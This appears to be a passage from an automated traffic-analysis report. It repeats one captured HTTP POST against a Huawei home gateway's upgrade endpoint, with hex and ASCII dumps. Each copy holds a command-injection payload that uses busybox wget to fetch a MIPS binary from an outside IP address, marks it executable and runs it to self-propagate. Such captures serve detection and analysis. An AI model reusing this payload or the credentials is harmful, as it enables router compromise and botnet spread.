41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 